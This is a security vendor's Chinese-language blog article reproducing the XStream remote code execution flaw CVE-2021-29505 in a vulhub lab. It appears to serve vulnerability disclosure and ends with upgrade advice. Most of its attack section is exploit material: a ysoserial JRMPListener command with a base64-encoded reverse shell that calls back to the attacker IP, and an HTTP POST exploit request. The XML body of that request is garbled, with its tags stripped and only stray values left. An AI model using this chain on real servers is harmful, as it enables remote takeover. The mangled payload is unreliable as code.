提交需求
*
*

*
*
*
立即提交
点击”立即提交”,表明我理解并同意 《美创科技隐私条款》
免费试用
400-811-3777

logo

    产品与服务
    解决方案
    技术支持
    合作发展
    关于美创
    申请试用
      热门阅读
      1

      浙江省委宣传部副部长、省委网信办主任赵磊:守正创新 辩证施策 全力推动网络生态治理工作迈上新台阶

      2026-02-10

       2

      美创产品全面入围中直机关2025年网络设备框架协议采购项目

      2026-02-04

       3

      连续5年!美创再获中国网络安全产业联盟“先进会员单位”表彰

      2026-01-21

       4

      每周安全速递³⁷¹ | 勒索软件攻击导致心理健康机构超11万人数据泄露

      2026-01-06

       5

      四年同行,韧性共铸:西南某商行携手美创科技再度通过年度容灾大考

      2025-12-26
      相关文章

      每周安全速递³⁷⁴ | Osiris勒索软件利用BYOVD技术禁用安全工具

      2026-02-02

      每周安全速递³⁷² | DeadLock勒索软件团伙利用Polygon智能合约存储代理服务器地址

      2026-01-19

      每周安全速递³⁷¹ | 勒索软件攻击导致心理健康机构超11万人数据泄露

      2026-01-06

      Strix自动渗透测试平台搭建与使用

      2025-12-22

      每周安全速递³⁷⁰ | 勒索软件攻击导致心理健康机构超11万人数据泄露

      2025-12-19
      Xstream远程代码执行漏洞复现
      发布时间:2021-06-18 阅读次数: 339 次

      XStream是一个常用的Java对象和XML相互转换的工具,攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成反序列化代码执行漏洞。该漏洞允许远程攻击者直接获取服务器权限。


      漏洞编号

      CVE-2021-29505


      影响范围


      xStream <= 1.4.16


      环境搭建


      1. 使用vulhub进行漏洞环境搭建


      https://raw.githubusercontent.com/vulhub/vulhub/master/xstream/CVE-2021-29505/docker-compose.yml


      2.执行如下命令启动镜像环境


      docker-compose up -d


      图片


      3. 访问地址:http://192.168.166.133:8080/


      图片

      漏洞复现


      攻击机ip:192.168.166.131

      靶机ip:192.168.166.133


      1.在攻击机上使用ysoserial的JRMPListener启动一个恶意的RMI Registry(工具下载地址:https://github.com/frohoff/ysoserial)。其中的bash命令需要进行bash64编码。


      图片


      2.Bash64编码后的反弹shell命令如下


      java -cp ysoserial-master.jarysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c{echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xNjYuMTMxLzIzMzMzIDA+JjE=}|{base64,-d}|{bash,-i}"


      3.执行过程如下


      图片


      4.执行如下数据包


      POST / HTTP/1.1

      Host:192.168.166.133:8080

      User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101Firefox/88.0

      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

      Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

      Connection:keep-alive

      Upgrade-Insecure-Requests:1

      Content-Type:application/xml

      Content-Length:3119


         

         

             

                 2

             

             3

             

                 12345

                 

                     com.sun.xml.internal.ws.api.message.Packet@2002fc1dContent

                 

             

             

                 12345

                 

                     

                        true

                        SOAP_11

                         

                         

                            false

                             

                                 

                                     

                                       

                                            aa

                                            aa

                                       

                                         

                                           

                                           

                                               

                                                     UnicastRef

                                                    192.168.166.131

                                                    1099

                                                     0

                                                    0

                                                    0

                                                    0

                                                    false

                                               

                                           

                                            192.168.166.131

                                             1099

                                       

                                   

                                 

                             

                         

                     

                 

           

         


      图片


      5. 获取反弹shell


      图片


      修复建议


      升级XStream到1.4.17版本及以上版本。

      上一条:shiro漏洞复现
      下一条:美国核武器承包商遭勒索软件攻击,部分数据泄露
      返回
      关注或联系美创
      官方订阅号 官方订阅号
      官方服务号 官方服务号
      第59号 第59号
      服务热线:400-811-3777
      商务合作:marketing@mchz.com.cn
      友情链接 中央网信办 公安部 工信部 CNCERT 中国信通院 中国软件测评中心 国家工业信息安全发展研究中心 赛迪研究院
      Copyright © 2024 杭州美创科技股份有限公司 All rights reserved.
      浙公网安备 33010502006954号 浙ICP备12021012号-1 网站地图 网站声明及隐私保护政策
      免费试用
      服务热线

      马上咨询

      400-811-3777

      回到顶部